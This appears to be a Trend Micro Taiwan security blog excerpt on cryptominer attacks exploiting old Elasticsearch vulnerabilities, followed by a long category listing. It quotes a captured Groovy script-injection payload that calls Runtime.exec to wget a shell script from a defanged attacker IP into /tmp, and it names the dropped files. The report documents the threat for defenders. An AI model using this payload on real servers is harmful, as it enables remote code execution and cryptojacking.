Elasticsearch - 資安趨勢部落格

虛擬貨幣病毒透過Elasticsearch 舊漏洞散播 ... 趨勢科技曾在蜜罐系統上發現了關於搜尋引擎Elasticsearch （用Lucene程式庫 ... 訂閱資安趨勢電子報. Skiptomaincontent 趨勢科技曾在蜜罐系統上發現了關於搜尋引擎Elasticsearch（用Lucene程式庫開發的開放原始碼Java搜尋引擎）的惡意挖礦(coinmining)活動。

這波攻擊利用了漏洞CVE-2015-1427（位在Groovy腳本引擎，讓遠端攻擊者可以用特製腳本來執行任意shell命令）以及CVE-2014-320（Elasticsearch預設設定內的漏洞）。

Elasticsearch已經不再支援有漏洞的版本。

我們在運行Elasticsearch的伺服器上發現帶有以下命令的查詢（ISC也在一篇文章中提到）：“{“lupin”:{“script”:“java.lang.Math.class.forName(\”java.lang.Runtime\”).getRuntime().exec(\”wgethxxp://69[.]30[.]203[.]170/gLmwDU86r9pM3rXf/update.sh-P/tmp/sssooo\”).getText()”}}}”這命令是由同個系統/攻擊主機執行，後續病毒也是放在此主機上。

在本文編寫時，使用此IP的是網域matrixhazel[.]com（無法連上）。

此系統安裝的是CentOS6，同時運行了網頁伺服器和SSH伺服器。

圖1、GreyNotes將此這主機標記為已知掃描器 要注意的是，這種攻擊並不新鮮，只是最近又重新出現。

趨勢科技的SmartProtectionNetwork11月在多個地區偵測到虛擬貨幣挖礦病毒，包括了台灣、中國和美國。

挖礦病毒散播bash腳本update.sh的方式是先調用shell來下載並輸出成檔案“/tmp/sssooo“（因為大多數系統對/tmp的限制較少）。

這種攻擊簡單卻會對受害者產生重大的影響。

一旦攻擊者可以在系統上執行任意命令，就可以提升權限，甚至將目標轉向其他系統來進一步地入侵網路。

還應該注意的是，雖然大多數案例的攻擊手法相同，但所使用的惡意檔案可能不同。

在我們所分析的案例中，使用的是update.sh。

一但執行腳本update.sh就會下載檔案devtools和config.json。

接著就會部署虛擬貨幣挖礦病毒（趨勢科技偵測為Coinminer.Linux.MALXMR.UWEIS)。

繼續閱讀 Searchfor: 訂閱資安趨勢電子報Email PC-cillin限時五折(8/1510:00止)【防毒軟體免費下載】懷疑中毒?立即掃描!【防毒軟體免費下載】懷疑中毒?立即掃描!近期文章 《資安新聞周報》政府官網屢遭駭台灣資安人才需求大增/7款惡意軟體偽裝成生產力APP/南韓電動車電池訂閱將上路3分之1價購車不是夢/民調：6成美國人支持下架TikTokAPP 十大常見的網路詐騙 這是iPhone中毒症狀嗎?五步驟檢驗是否確診 點了Mac電腦上彈出的病毒警告視窗，卻出事了！ Mac啟動磁碟已滿!三招清出更多空間 Mac需要防毒軟體嗎？六步驟讓蘋果電腦更安全 十大知名勒索病毒 什麼是刷評詐騙（BrushingScam）？ IG帳號被盜怎麼辦？三個步驟找回來 資安警訊:Magniber勒索病毒,偽裝Windows10系統更新程式 《資安新聞周報》愈來愈多IIS外掛被用作駭入企業伺服器的後門/美政府也示警：快更新Chrome！Google修補5項「高風險漏洞」 /6月DiscordNFT詐騙增55%、損失2200萬美元/ LinkedIn蟬聯網釣冒用冠軍 如何減少卡頓並提升網路遊戲速度? 雙重認證(2FA)是什麼?它是如何運作的? 如何開啟臉書的雙重驗證(2FA)? 趨勢科技穩坐雲端工作負載防護市場龍頭 鬼門開開關關,它未曾離開,一直都在網路上遊蕩…… 疫後報復性出遊潮來襲趨勢科技提醒民眾小心旅遊常見三大網路陷阱 五步驟防止臉書(FB)帳號被盜 前三大臉書釣魚詐騙,如何避免上當? 2022年前三大推特詐騙–如何避免社群媒體噩夢?手機中毒症狀-懷疑手機中毒,即刻檢測!手機需要防毒軟體嗎？電腦中毒10症狀懷疑電腦中毒該怎麼辦?不小心點到可疑連結時該做的兩件事!手機/電腦中毒,會出現哪些症狀?手機也會感染病毒! 手機中毒,會”傳染”給電腦嗎?懷疑手機/電腦中毒?想找線上掃毒工具?防毒軟體免費下載,立即掃描檢測 什麼是電腦病毒?七種常見惡意程式感染來源網路變慢風扇很大聲電費暴增?可能是它暗中搞鬼!電腦變慢?免重灌,加速你的Windows電腦必學技巧!擔心被安裝偷窺木馬,私生活全都露?Youtube看影片變好卡?原因讓人好驚訝!包裹出現這特徵,超商店員警告是詐騙!「有人已取得您的帳戶密碼,請登入gmail重設密碼」真的?假的?5招防帳密遭駭為何要付費買防毒軟體?免費防毒軟體有哪些風險?文章類別文章類別選取分類165反詐騙專區  (141)   網路謠言  (2)3CFUN新聞  (1)5G資安  (9)AI(人工智慧)  (22)AppleStore  (8)apple蘋果  (18)APT/APT攻擊/APT進階持續性威脅/AdvancedPersistentThreat  (199)   假冒健保局  (3)ATM惡意程式  (13)AWS  (2)BadRabbit  (1)Bitcoin比特幣  (13)BlackSEO  (9)BYOD  (24)Containers(容器)  (6)DDos  (12)DevOps  (15)DNS  (2)DNS惡意軟體  (2)Dropbox  (1)FinTech  (1)HTML5  (3)i3C-您隨身的3C好麻吉/趨勢科技3C好麻吉  (145)   LINE常見問題  (32)   上網常見問題  (41)   手機常見問題  (48)   生活實用app  (3)   網路印表機  (1)   網路設定問題  (5)   網路速度問題  (3)   電腦常見問題  (22)ICS工業控制系統  (13)IIOT工業物聯網  (25)Intel處理器  (1)iOS  (25)IOT物聯網  (299)   IoT攻擊情境  (141)      IP網路監視攝影機  (4)      PoS收銀系統/端點銷售惡意軟體  (9)      智慧型電視  (1)      車連網/聯網汽車/智慧汽車  (25)   IoT分析觀點  (27)   智慧喇叭  (5)   智慧型玩具  (2)   智慧城市  (3)   智慧家庭/智慧家電/智慧管家  (49)      智慧網安管家(HomeNetworkSecurity)  (12)   智慧語音助理  (5)   監視器/家用監視攝影機  (1)   穿戴式設備(wearables)  (2)   認識物聯網(IoT)  (11)KakaoTalk  (1)Linux  (1)Linux病毒  (1)MAC  (18)Mac攻擊  (32)MAC病毒  (29)malvertising惡意廣告  (24)MDM(Mobiledevicemanagement)行動裝置管理  (2)MDR(ManagedDetectionandResponse)託管式偵測及回應服務  (18)Microsoft零時差漏洞攻擊  (6)Opensource開放原始碼  (1)PokemoGo神奇寶貝  (1)PUA非必要應用程式/可能有害的應用程式（Potentiallyunwanted application）  (3)Skype  (2)SPAM垃圾郵件防護  (7)SpyEye  (2)TMMS  (1)Tor  (1)WFH/在家工作/workfromhome/遠端工作/視訊會議  (27)wifi  (3)Windows10  (5)Windows8/Win8  (4)XDR  (2)《Project2030原創影集》Ctrl+Alt+真相。

  (1)《2020》網路危機影集  (4)中小企業資安  (183)企業資安  (514)   BYOD(自帶設備)  (9)   CISO(資安長)搶先看  (14)   EDR(EndpointDetectionandResponse)端點偵測及回應  (4)   GDPR(GeneralDataProtectionRegulation)歐盟通用資料保護法  (11)   ICS/SCADA  (4)   XDR(全面偵測及回應)  (19)   企業簡易資安指南  (8)   商業流程入侵(BPC)  (7)   折價券詐騙(Couponfraud)  (1)   聊天平台  (1)   變臉詐騙/執行長CEO詐騙/BEC-BusinessEmailCompromise企業郵件受駭詐騙  (60)   銀行木馬  (13)   雙重攻擊  (2)   零信任(ZeroTrust)資安  (2)   電子郵件防護  (4)   風險管理(RiskManagement)  (8)假新聞fakenews)  (4)假防毒軟體  (17)偷窺病毒/狗仔病毒  (1)傀儡殭屍網路  (52)元宇宙資安  (1)免費下載  (3)公共建設資安  (7)冒用健保局攻擊中小企業  (2)加密貨幣/虛擬貨幣/數位貨幣  (75)勒索病毒/勒索軟體  (290)勒索蠕蟲  (4)區塊鏈資安  (3)名人病毒  (10)名人被駭/名人遭盜名  (17)地下經濟/網路非法服務/黑色產業  (74)   DeepWeb(深層網路)  (8)   黑暗網路(DarkWeb)  (10)垃圾郵件(SPAM)  (4)基礎建設安全  (7)報告數據  (342)   IOT物聯網裝置  (2)   圖表  (27)   季度資安報告  (25)   年中資安報告  (16)   年度資安報告/年度回顧與預測  (93)   手機平板行動裝置資安報告  (36)   白皮書whitepaper  (11)   盤點資安數據  (4)   網路釣魚報告  (20)   網路間諜活動  (7)   臉書Facebook等社群網路(站)報告  (13)   變臉詐騙(BEC)  (5)   趨勢科技PC-cillin數位生活調查中心  (16)   防毒推薦/防毒軟體評比/排名  (25)   雲端運算應用報告  (1)   電競遊戲  (1)季節性資安議題/電腦病毒  (83)   1111光棍節  (1)   88父親節  (1)   兒童節/婦幼節  (5)   報稅/退稅  (8)   情人節  (12)   新年  (8)   春節  (10)   暑假  (3)   母親節  (8)   聖誕節  (8)   萬聖節Halloween  (8)   鬼月  (1)   黑色星期五/網購星期一  (4)實用app  (1)工業資安  (14)   ICS工業控制系統（industrialcontrolsystem）  (4)影片  (17)   Don’tbethatguy不要成為那傢伙  (5)   兒童上網安全  (5)惡意巨集  (5)惡意軟體病毒發展史  (23)   電腦病毒30演變史  (16)憑證填充(CredentialStuffing)攻擊  (1)懶人包  (4)手機病毒/手機平板行動安全  (429)   Android(安卓)  (185)   APP  (56)   AppleStore  (8)   Googleplay  (46)   Google應用程式  (22)   iBeacons  (1)   iOS  (15)   iPhone  (36)   QRCode  (1)   中文病毒  (1)   全民手機反詐騙行動  (41)      LINE詐騙  (20)      手機詐騙  (3)      簡訊詐騙  (13)   手機app  (34)   手機安全  (28)      行動支付  (2)   手機挖礦惡意程式  (8)   手機購物  (9)   手機遊戲/手游  (20)   手機遺失  (1)   手機防毒  (7)技術支援詐騙  (5)挖礦劫持  (19)挖礦病毒/挖礦惡意程式/採礦惡意程式  (57)數位勒索  (2)數位生活  (33)數據  (25)新攻擊手法  (3)新聞稿  (229)旅遊  (7)時事相關網路攻擊事件  (49)   2014世足賽(2014年FIFA世界盃足球賽)  (5)   MERS  (1)   俄烏衝突  (7)未分類  (98)概念證明惡意病毒  (3)概念驗證proofofconcept(PoC)  (1)機器學習  (15)機器學習machine-learning  (28)歷史上的病毒  (14)比特幣提款機病毒BTCATMMalware  (1)活動專區  (12)   金毒獎  (2)漏洞  (75)漏洞攻擊  (266)   AdobeFlash  (16)   ApacheLog4j(Log4Shell)漏洞  (6)   EternalBlue永恆之藍  (1)   Heartbleed漏洞  (12)   Java零時差漏洞攻擊  (11)   Microsoft零時差漏洞  (2)   Shellshock/Bash漏洞  (11)   TLS/SSL漏洞  (2)   WindowsXP  (2)   「蟲洞」(Wormhole)  (2)   黑洞漏洞攻擊包（BlackholeExploitKit:BHEK）  (3)灰色軟體（Grayware）  (2)災難詐騙  (57)   災難詐騙/肺炎疫情/冠狀病毒/COVID-19/新冠肺炎/WFH/停課不停學  (51)無檔案式惡意程式FilelessMalware  (17)病毒事件簿  (20)病毒威脅警訊  (7)白帽菁英養成計畫  (4)   T-BrainAI實戰吧  (2)目標式勒索病毒  (7)目標式攻擊  (52)目標式攻擊/針對性目標攻擊(Targetedattack)  (27)看漫畫談資安  (8)知名機構組織被駭  (6)研討會  (1)硬碟空間  (2)磁碟清除病毒  (1)社交工程（socialengineering）  (116)社群(交)網路  (220)   Clubhouse等語音聊天社群平台  (1)   FACEBOOK臉書(fb)  (124)   Google+  (6)   Instagram/IG  (30)   KakaoTalk  (1)   LINE  (6)   LinkedIn  (9)   Myspace  (1)   Pinterest  (5)   SnapChat  (3)   TikTok  (1)   Twitter推特  (34)   Viadeo  (1)粉絲好康  (7)網路交友詐騙  (1)網路危機  (22)網路犯罪  (50)網路犯罪駭客集團  (29)網路購物  (30)網路釣魚  (98)網路釣魚Phishing  (240)   AppleID  (6)   FacebookFB臉書中毒/網路釣魚  (5)   OAuth登入憑證網路釣魚  (1)   OAuth網路釣魚  (1)   Quishing(QRCode網路釣魚)  (1)   手機平板行動網路釣魚  (4)   簡訊網路釣魚(SMiShing或SMSphishing)  (9)網路銀行  (10)   開放銀行  (3)網路銀行詐騙  (54)網路隱私  (58)網頁竄改（WebDefacement）  (1)蘋果  (9)虛擬實境(VR)  (2)蠕蟲  (1)製造業資安  (1)詐騙  (102)   NFT詐騙  (8)   Oneclick詐騙  (1)   包裹詐騙  (2)   影音串流平台詐騙  (1)   性愛勒索(SextortionScams)  (2)   技術支援詐騙  (3)   旅遊詐騙  (4)   網購詐騙  (14)      一頁式詐騙  (6)   網路交友詐騙Catfishing  (1)   網路詐騙  (39)   詐騙新聞周報  (3)   電信詐騙TelecomFraud  (1)資安  (14)資安/3C小百科  (462)   Apple平台/蘋果裝置  (11)   TrendLabs數位生活指南  (19)   VPN(VirtualPrivateNetwork)虛擬網路  (3)   WiFi  (7)   信用卡  (8)   備份  (4)   家用路由器  (7)   密碼管理  (55)   帳號被盜  (20)   常見資安/數位問題  (22)   手機中毒症狀  (6)   看漫畫談資安  (12)   網路報稅  (9)   資安漫畫  (128)      小希和小玲的資安大小事  (21)   資安漫畫-小廣和小明的資安大小事  (95)   電子郵件加密  (2)   電腦中毒症狀  (4)資安事件評論  (13)資安人才培育  (3)資安名詞  (255)   2FA(雙重驗證/兩步驟驗證)  (5)   AaaS(存取服務)  (1)   Adware(廣告軟體)  (1)   APT進階持續性滲透攻擊(AdvancedPersistentThreat,APT)  (4)   BlackSEO  (1)   BrushingScam（刷評詐騙）  (1)   CaaS(CybercrimeasaService，網路犯罪服務)  (1)   Cache(快取)  (1)   CAPTCHA驗證機制  (1)   Catfishing網路交友詐騙  (1)   clickjacking點擊劫持  (3)   ComputerVirus電腦病毒  (1)   Cracker(破壞者)  (1)   CryptoMining（加密貨幣挖礦）  (1)   Cryptojacking（挖礦劫持）  (3)   Cybercriminal子(網路犯罪份子)  (2)   Cybermercenary（網路傭兵）  (1)   Cybersquatting域名搶註  (1)   DDoS攻擊(分散式阻斷服務攻擊)  (4)   DeepWeb深層網路/DarkWeb黑暗網路  (1)   Deepfake(深偽技術)  (2)   DevOps  (1)   Facebookfired  (3)   FNaaS（FakeNewsasaService）  (1)   hacktivism(激進駭客主義)  (1)   Iac(infrastructureascode)基礎架構程式碼  (1)   IAM,Identityandaccessmanagement(身分識別與存取管理)  (1)   InternetofEverything）  (2)   IOT殭屍網路(IoTbotnet)  (1)   IP（InternetProtocol）網際網路協定地址  (1)   IPV6  (1)   keylogger(鍵盤側錄器)  (1)   Malware(惡意軟體)  (1)   NFT(Non-fungibletokens)非同質化代幣  (2)   QR碼垃圾郵件  (1)   Quishing(QRCode網路釣魚)  (1)   RaaS  (4)   Smishing或SMSphishing(釣魚簡訊)  (1)   SMSPVA服務-手機簡訊電話認證帳號服務  (1)   Tapjacking  (1)   unfriend  (1)   VirtualPatching  (1)   VirtualPatching(虛擬修補)  (1)   VPN(VirtualPrivateNetwork)虛擬網路  (2)   WebDefacement  (1)   「Drivebydownload」路過式下載（隱藏式下載、偷渡式下載、強迫下載）  (1)   「數位綁架」(digitalkidnapping)/「虛擬綁架」(virtualkidnapping)  (1)   假分身（SockPuppet）  (1)   假防毒軟體FakeAV  (1)   傀儡殭屍網路botnet  (8)   元宇宙（Metaverse）  (3)   加密(Encryption)  (1)   加密貨幣/虛擬貨幣/數位貨幣（Cryptocurrency）  (6)   勒索病毒/勒索軟體(ransomware)  (40)   區塊鏈(Blockchain)  (1)   商業流程入侵(BPC)  (1)   圖像隱碼術(Steganography)  (3)   垃圾應用程式（JunkApps）  (1)   垃圾郵件SPAM  (8)   執行長詐騙(CEOFraud)  (1)   奈及利亞419詐騙案（Nigerian419Scam）  (2)   性愛勒索(SextortionScams)  (1)   惡意廣告Malvertising  (3)   技術支援詐騙(TechSupportScams,TSS))  (1)   挖礦(coinmining)  (1)   木馬病毒  (12)   機器學習(MachineLearning)  (1)   橫向網路釣魚(lateralphishing)  (1)   比特幣（Bitcoin）  (2)   水坑（wateringhole）攻擊  (1)   深層網路(DeepWeb)  (1)   激進駭客(Hacktivist)  (2)   激進駭客主義（Hacktivism）  (1)   灰帽(GreyHat)  (1)   無檔案病毒（FilelessMalware）  (1)   物聯網（IoT)  (2)   白帽(WhiteHat)  (1)   目標式攻擊/針對性攻擊/鎖定目標攻擊(Targetedattack)  (36)   社交工程  (4)   綁架讚（Likejacking）  (1)   網路捕鯨(Whaling)  (1)   網路釣魚Phishing  (7)   網路霸凌bully  (2)   肉搜(doxing)  (1)   虛擬修補(VirtualPatching)  (1)   語音釣魚Vishing  (2)   變臉詐騙/BEC-BusinessEmailCompromise商務郵件/企業郵件受駭詐騙  (9)   錢騾moneymules  (2)   間諜軟體Spyware  (5)   雲端運算  (8)   零信任(ZeroTrust)  (1)   電腦病毒(ComputerVirus/Malware)  (1)   駭客(Hacker)  (2)   魚叉式網路釣魚（Spearphishing）  (3)   黑帽(BlackHat)  (1)   黑洞漏洞攻擊垃圾郵件(BlackHoleExploitKitspam)  (2)資安新聞  (161)資安新聞周報  (310)資安焦點  (8)資安競賽  (3)資安經典語錄  (2)資料外洩/個資外洩  (187)趨勢專家談趨勢  (175)   ChiefCybersecurityOfficer(CCO)網路安全長  (5)   未來學(FuTuRology)  (3)   趨勢科技CTO觀點  (23)   趨勢科技全球安全研究副總裁RikFerguson  (20)   趨勢科技創辦人張明正  (2)   趨勢科技執行長(CEO)陳怡樺  (11)   趨勢科技文化長專欄  (4)   趨勢科技網路資安副總裁GregYoung  (1)   趨勢科技雲端安全副總DaveAsprey  (4)   跟著總經理看資安趨勢  (7)趨勢教育基金會  (1)趨勢科技30周年  (1)趨勢科技TrendLabs研究報告  (34)趨勢科技XGen  (10)趨勢科技做公益  (1)趨勢科技兒童和家庭網路安全計畫  (17)趨勢科技得獎/協助辦案紀錄  (80)趨勢科技活動  (17)   CloudSec企業資安高峰論壇  (5)趨勢科技產品  (318)   CloudAppSecurity  (2)   DeepDiscovery  (14)   DeepSecurity  (43)   DeepSecuritySmartCheck  (1)   Dr.Antivirus  (1)   Dr.Cleaner蘋果Mac電腦磁碟清理專家  (5)   EndpointSensor  (1)   HostedEmailSecurity  (1)   InterScanMessagingSecurityVirtualAppliance  (1)   JewelryBox回憶隨享盒  (2)   MDR-趨勢科技託管式偵測及回應（manageddetectionandresponse  (6)   MDR）  (1)   OfficeScan  (7)   PC-cillin家長守護版  (5)   SafeSyncforEnterprise趨勢科技企業私有雲  (1)   SMW(SafeMobileWorkforce)  (1)   T-brain  (1)   TippingPoint  (1)   TrendMicroCloudOne  (1)   TrendMicroOne   (4)   TrendMicroVisionOne™  (1)   TrendMicroZero  (1)   VicOne  (1)   VirtualNetworkFunctionSuite  (1)   Worry-FreeBusinessSecurity  (1)    TMIS2.0  (1)   主動式雲端截毒技術  (2)   個資保鑣  (6)   加速達人  (3)   加速達人app  (1)   回憶隨享盒(JewelryBox)  (2)   智慧網安管家(HomeNetworkSecurity)  (8)   趨勢科技CloudAppSecurity™  (1)   趨勢科技IoTSecurity2.0(TrendMicroIoTSecurity  (1)   趨勢科技TrendMicroCloudOne  (1)   趨勢科技CloudAppSecurity  (1)   趨勢科技QRCode掃描器  (1)   趨勢科技密碼管理通  (11)   趨勢科技旗艦服務  (13)   趨勢科技行動安全防護  (5)   防毒軟體PC-cillin雲端版  (152)      PC-cillin常見問題  (9)   防詐達人(Dr.Message)  (9)趨勢科技聲明  (1)遊戲game  (29)運動賽事威脅  (3)重大資安事件  (197)   14億帳號密碼外洩  (1)   Anonymous匿名者  (4)   AshleyMadison  (2)   DNSChanger  (2)   DRIDEX殭屍網路  (1)   FACEBOOK(fb)臉書詐騙/病毒  (4)   Flame  (1)   HackingTeam資料外洩  (14)   Heartbleed  (8)   iCloud被駭明星影片  (2)   IntelCPU漏洞/Intel晶片漏洞  (4)   Koobface  (2)   MicrosoftExchangeServer遭大規模零時差漏洞攻擊  (2)   Mirai殭屍網路  (6)   PawnStorm  (9)   petya勒索病毒  (3)   Revil勒索病毒/勒索軟體  (1)   Shellshock漏洞  (11)   SpyEye  (3)   Yahoo五億用戶帳號密碼被駭  (3)   勒索病毒PETYA  (1)   勒索病毒ransomware/勒索軟體  (42)   勒索病毒/勒索蠕蟲WannaCry/Wcry(想哭)  (19)   南韓遭受駭客攻擊  (5)   烏克蘭斷電事件  (2)   索尼影視（SonyPictures）攻擊事件  (4)間諜軟體  (10)防毒軟體  (58)防毒軟體推薦  (62)   2022防毒軟體推薦  (7)防毒軟體新技術  (14)雲端資安  (62)雲端運算  (180)   AWS(AmazonWebServices)  (10)   BigData巨量海量量資料  (8)   Hadoop  (2)   VDI虛擬桌面架構  (6)   虛擬化  (41)   雲端代管服務  (3)電腦病毒/惡意程式  (38)青少年兒童上網安全  (90)駭客列傳  (11)黑洞垃圾郵件（BlackHoleExploitKitspam）  (1)